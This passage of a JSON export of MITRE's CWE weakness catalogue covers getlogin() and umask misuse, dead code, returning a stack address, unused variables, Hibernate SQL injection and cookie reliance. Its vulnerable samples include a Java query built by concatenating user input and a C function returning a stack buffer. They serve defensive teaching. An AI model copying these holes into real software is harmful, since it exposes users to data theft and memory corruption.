(isTrustedGroup(pwd->pw_gid)) {} else {}","xhtml:br":"","xhtml:div":[{"#text":"allow();","attr":{"@_style":"margin-left:10px;"}},{"#text":"deny();","attr":{"@_style":"margin-left:10px;"}}]}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Often Misused: Authentication"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Misused Authentication: getlogin()","attr":{"@_Date":"2008-04-11"}}}},"560":{"attr":{"@_ID":"560","@_Name":"Use of umask() with chmod-style Argument","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product calls umask() with an incorrect argument that is specified as if it is an argument to chmod().","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"687","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control"],"Impact":["Read Files or Directories","Modify Files or Directories","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Use umask() with the correct argument."},{"Phase":"Testing","Description":"If you suspect misuse of umask(), you can use grep to spot call instances of umask()."}]},"Notes":{"Note":{"#text":"Some umask() manual pages begin with the false statement: \\"umask sets the umask to mask & 0777\\" Although this behavior would better align with the usage of chmod(), where the user provided argument specifies the bits to enable on the specified file, the behavior of umask() is in fact opposite: umask() sets the umask to ~mask & 0777. The documentation goes on to describe the correct usage of umask(): \\"The umask is used by open() to set initial file permissions on a newly-created file. Specifically, permissions in the umask are turned off from the mode argument to open(2) (so, for example, the common umask default value of 022 results in new files being created with permissions 0666 & ~022 = 0644 = rw-r--r-- in the usual case where the mode is specified as 0666).\\"","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Other_Notes"}],"Previous_Entry_Name":{"#text":"Often Misused: umask()","attr":{"@_Date":"2008-04-11"}}}},"561":{"attr":{"@_ID":"561","@_Name":"Dead Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software contains dead code, which can never be executed.","Extended_Description":"Dead code is source code that can never be executed in a running program. The surrounding code makes it impossible for a section of code to ever be executed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1164","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Other","Impact":"Quality Degradation","Note":"Dead code that results from code that can never be executed is an indication of problems with the source code that needs to be fixed and is an indication of poor quality."},{"Scope":"Other","Impact":"Reduce Maintainability"}]},"Detection_Methods":{"Detection_Method":[{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Attack Modeling"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Binary / Bytecode Quality Analysis","Compare binary / bytecode to application permission manifest"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Automated Monitored Execution"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Permission Manifest Analysis"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Source Code Quality Analyzer"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Warning Flags","Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Remove dead code before deploying the application."},{"Phase":"Testing","Description":"Use a static analysis tool to spot dead code."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The condition for the second if statement is impossible to satisfy. It requires that the variables be non-null, while on the only path where s can be assigned a non-null value there is a return statement.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"String s = null;if (b) {}if (s != null) {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"s = \\"Yes\\";return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"Dead();","attr":{"@_style":"margin-left:10px;"}}]}}},{"Intro_Text":"In the following class, two private methods call each other, but since neither one is ever invoked from anywhere else, they are both dead code.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class DoubleDead {}","xhtml:div":{"#text":"private void doTweedledee() {}private void doTweedledumb() {}public static void main(String[] args) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"doTweedledumb();","attr":{"@_style":"margin-left:10px;"}},{"#text":"doTweedledee();","attr":{"@_style":"margin-left:10px;"}},{"#text":"System.out.println(\\"running DoubleDead\\");","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["",""]}}},"Body_Text":"(In this case it is a good thing that the methods are dead: invoking either one would cause an infinite loop.)"},{"Intro_Text":"The field named glue is not used in the following class. The author of the class has accidentally put quotes around the field name, transforming it into a string constant.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class Dead {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String glue;public String getGlue() {}","xhtml:br":["",""],"xhtml:div":{"#text":"return \\"glue\\";","attr":{"@_style":"margin-left:10px;"}}}}}}}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2014-1266","Description":"chain: incorrect \\"goto\\" in Apple SSL product bypasses certificate validation, allowing Adversary-in-the-Middle (AITM) attack (Apple \\"goto fail\\" bug). CWE-705 (Incorrect Control Flow Scoping) -> CWE-561 (Dead Code) -> CWE-295 (Improper Certificate Validation) -> CWE-393 (Return of Wrong Status Code) -> CWE-300 (Channel Accessible by Non-Endpoint).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1266"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC07-C","Entry_Name":"Detect and remove dead code"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"MSC00-PL","Entry_Name":"Detect and remove dead code","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP2","Entry_Name":"Unused Entities"},{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-20"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-20"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Common_Consequences, References, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}]}},"562":{"attr":{"@_ID":"562","@_Name":"Return of Stack Variable Address","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A function returns the address of a stack variable, which will cause unintended program behavior, typically in the form of a crash.","Extended_Description":"Because local variables are allocated on the stack, when a program returns a pointer to a local variable, it is returning a stack address. A subsequent function call is likely to re-use this same stack address, thereby overwriting the value of the pointer, which no longer corresponds to the same variable since a function\'s stack frame is invalidated when it returns. At best this will cause the value of the pointer to change unexpectedly. In many cases it causes the program to crash the next time the pointer is dereferenced.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"758","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"672","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"825","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Indirect"},{"Ordinality":"Primary"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity","Confidentiality"],"Impact":["Read Memory","Modify Memory","Execute Unauthorized Code or Commands","DoS: Crash, Exit, or Restart"],"Note":"If the returned stack buffer address is dereferenced after the return, then an attacker may be able to modify or read memory, depending on how the address is used. If the address is used for reading, then the address itself may be exposed, or the contents that the address points to. If the address is used for writing, this can lead to a crash and possibly code execution."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Use static analysis tools to spot return of the address of a stack variable."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following function returns a stack address.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* getName() {}","xhtml:div":{"#text":"char name[STR_MAX];fillInName(name);return name;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"DCL30-C","Entry_Name":"Declare objects with appropriate storage durations","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS34-C","Entry_Name":"Do not call putenv() with a pointer to an automatic variable as the argument"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Stack Address Returned","attr":{"@_Date":"2008-04-11"}}}},"563":{"attr":{"@_ID":"563","@_Name":"Assignment to Variable without Use","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The variable\'s value is assigned but never used, making it a dead store.","Extended_Description":"After the assignment, the variable is either assigned another value or goes out of scope. It is likely that the variable is simply vestigial, but it is also possible that the unused variable points out a bug.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1164","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Alternate_Terms":{"Alternate_Term":{"Term":"Unused Variable"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"],"Note":"This weakness could be an indication of a bug in the program or a deprecated variable that was not removed and is an indication of poor quality. This could lead to further bugs and the introduction of weaknesses."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Remove unused variables from the code."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code excerpt assigns to the variable r and then overwrites the value without using it.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"r = getName();r = getNewBuffer(buf);","xhtml:br":""}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC00-C","Entry_Name":"Compile cleanly at high warning levels"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"MSC01-PL","Entry_Name":"Detect and remove unused variables","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP2","Entry_Name":"Unused Entities"}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Common_Consequences, Description, Name, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Alternate_Terms, Name, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Unused Variable","attr":{"@_Date":"2014-06-23"}},{"#text":"Assignment to Variable without Use (\'Unused Variable\')","attr":{"@_Date":"2017-11-08"}}]}},"564":{"attr":{"@_ID":"564","@_Name":"SQL Injection: Hibernate","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Using Hibernate to execute a dynamic SQL statement built with user-controlled input can allow an attacker to modify the statement\'s meaning or to execute arbitrary SQL commands.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"89","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"89","@_View_ID":"928","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"89","@_View_ID":"1305","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"A non-SQL style database which is not subject to this flaw may be chosen."},{"Phase":"Architecture and Design","Description":"Follow the principle of least privilege when creating user accounts to a SQL database. Users should only have the minimum privileges necessary to use their account. If the requirements of the system indicate that a user can read and modify their own data, then limit their privileges so they cannot read/write others\' data."},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"Phase":"Implementation","Description":"Implement SQL strings using prepared statements that bind variables. Prepared statements that do not bind variables can be vulnerable to attack."},{"Phase":"Implementation","Description":"Use vigorous allowlist style checking on any user input that may be used in a SQL command. Rather than escape meta-characters, it is safest to disallow them entirely. Reason: Later use of data that have been entered in the database may neglect to escape meta-characters before use. Narrowly define the set of safe characters based on the expected value of the parameter in the request."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code excerpt uses Hibernate\'s HQL syntax to build a dynamic query that\'s vulnerable to SQL injection.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String street = getStreetFromUser();Query query = session.createQuery(\\"from Address a where a.street=\'\\" + street + \\"\'\\");","xhtml:br":""}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"109"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"565":{"attr":{"@_ID":"565","@_Name":"Reliance on Cookies without Validation and Integrity Checking","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application relies on the existence or values of cookies when performing security-critical operations, but it does not properly ensure that the setting is valid for the associated user.","Extended_Description":"Attackers can easily modify cookies, within the browser or by implementing the client-side code outside of the browser. Reliance on cookies without detailed validation and integrity checking can allow attackers to bypass authentication, conduct injection attacks such as SQL injection and cross-site scripting, or otherwise modify inputs in unexpected 